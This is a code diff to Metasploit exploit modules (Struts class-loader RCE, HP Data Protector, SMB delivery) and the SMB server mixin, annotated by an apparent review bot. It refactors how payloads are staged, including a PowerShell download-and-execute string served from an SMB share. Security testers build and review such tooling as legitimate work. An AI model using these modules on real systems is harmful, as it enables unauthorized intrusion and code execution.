diff --git a/lib/msf/core/exploit/remote/smb/server/share.rb b/lib/msf/core/exploit/remote/smb/server/share.rb
index 09b52fc528..12ed30f585 100644
--- a/lib/msf/core/exploit/remote/smb/server/share.rb
+++ b/lib/msf/core/exploit/remote/smb/server/share.rb
@@ -59,7 +59,8 @@ module Msf
 super(opts)
 virtual_disk = RubySMB::Server::Share::Provider::VirtualDisk.new(@share)
- virtual_disk.add_dynamic_file("#{@folder_name}#{File::SEPARATOR}#{@file_name}") do |client, _smb_session|
+ # the virtual disk expects the path to use the native File::SEPARATOR so normalize on that here
+ virtual_disk.add_dynamic_file("#{@folder_name}#{File::SEPARATOR}#{@file_name}".gsub(/\/|\\/, File::SEPARATOR)) do |client, _smb_session|
 get_file_contents(client: client)
 end
 service.add_share(virtual_disk)
diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb
index 0dd4d0d2c0..fd05696dc5 100644
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
 OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
 ])
- deregister_options('SHARE', 'FILE_NAME', 'FOLDER_NAME', 'FILE_CONTENTS')
+ deregister_options('SHARE', 'FILE_NAME', 'FOLDER_NAME')
 end
 def jsp_dropper(file, exe)
@@ -217,10 +217,15 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 end
- # Used with SMB targets
- def primer
+ def setup
+ super
+ self.file_name << '.jsp'
 self.file_contents = payload.encoded
+ end
+
+ # Used with SMB targets
+ def primer
 print_status("JSP payload available on #{unc}...")
 print_status("Modifying Class Loader...")
@@ -300,4 +305,3 @@ class MetasploitModule < Msf::Exploit::Remote
 modify_class_loader(properties)
 end
 end
-
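Review bot: The comment added above `add_dynamic_file` calls `File::SEPARATOR` the native separator, but in Ruby that constant is "/" on every platform (the Windows backslash is `File::ALT_SEPARATOR`), so the new line simply rewrites every backslash to a forward slash. I would reword it to `# the virtual disk expects File::SEPARATOR ("/" on every platform), so rewrite backslashes to it`, and the substitution reads more plainly as `.tr('\\', File::SEPARATOR)`. The normalization also leaves a leading or doubled separator in place when `@folder_name` is empty or already ends in one; whether the virtual disk tolerates that is not visible here. The enclosing method starts and ends outside the hunk.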
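Review bot: `self.file_name << '.jsp'` in the new `setup` appends to the existing string in place, so it changes every other reference to the object that `super` stored and raises if that object is frozen; where the string comes from is not visible in this hunk. Assigning a fresh string avoids both: `self.file_name = "#{file_name}.jsp"`. `setup` also carries no comment now that `# Used with SMB targets` has moved down to `primer`; a line such as `# Set the served file name and contents before the SMB share is started` would say why this work left `primer`, if that is indeed the reason. `primer` continues past the end of the hunk.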
diff --git a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
index df3ad36812..313d64f558 100644
--- a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
@@ -55,7 +55,6 @@ class MetasploitModule < Msf::Exploit::Remote
 ])
 deregister_options('FOLDER_NAME')
- deregister_options('FILE_CONTENTS')
 deregister_options('SHARE')
 deregister_options('FILE_NAME')
 end
@@ -95,11 +94,15 @@ class MetasploitModule < Msf::Exploit::Remote
 Rex::Text.to_ascii(resp).chop.chomp
 end
- def primer
- self.file_contents = generate_payload_exe
- self.file_name = "installservice.exe"
- self.share = "Omniback\\i386"
+ def setup
+ super
+ self.file_contents = generate_payload_exe
+ self.file_name = "i386\\installservice.exe"
+ self.share = "Omniback"
+ end
+
+ def primer
 print_status("File available on #{unc}...")
 vprint_status("#{peer} - Trying to execute remote EXE...")
diff --git a/modules/exploits/windows/smb/smb_delivery.rb b/modules/exploits/windows/smb/smb_delivery.rb
index 6a934772b7..f35dbb1c70 100644
--- a/modules/exploits/windows/smb/smb_delivery.rb
+++ b/modules/exploits/windows/smb/smb_delivery.rb
@@ -53,8 +53,6 @@ class MetasploitModule < Msf::Exploit::Remote
 [
 OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll'])
 ])
-
- deregister_options('FILE_CONTENTS')
 end
 def primer
@@ -66,7 +64,6 @@ class MetasploitModule < Msf::Exploit::Remote
 remove_comspec: true,
 wrap_double_quotes: true)
- ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
 download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)
 download_and_run = "#{ignore_cert}#{download_string}"
 print_line generate_psh_command_line(
 noprofile: true,
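Review bot: In the new `setup`, `self.file_name = "i386\\installservice.exe"` now carries a directory component joined with a backslash while `self.share` shrinks to `"Omniback"`, and nothing in the method says why the split moved. This presumably depends on the separator normalization the same commit adds in `lib/msf/core/exploit/remote/smb/server/share.rb`. A comment such as `# i386 is a folder inside the Omniback share; the share mixin normalizes the backslash` would keep the two changes tied together. `primer` continues past the end of the hunk.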
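Review bot: The unchanged line `download_and_run = "#{ignore_cert}#{download_string}"` still interpolates `ignore_cert`, whose only assignment visible in this hunk is the line being removed. Unless `ignore_cert` is also defined as a method somewhere outside the hunk, Ruby will raise NameError when this branch runs. Dropping the interpolation, `download_and_run = download_string`, keeps the branch working. The enclosing method starts before and ends after the hunk.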